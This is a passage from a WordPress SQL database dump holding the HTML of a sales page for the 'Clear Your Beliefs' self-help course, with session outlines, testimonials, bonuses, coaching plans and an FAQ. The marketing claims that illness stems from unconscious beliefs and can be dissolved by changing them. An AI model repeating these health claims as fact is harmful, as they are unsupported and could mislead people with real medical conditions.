S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 18:45:21', '2014-06-17 23:45:21', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(976, 2, '2014-06-17 18:46:48', '2014-06-17 23:46:48', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating 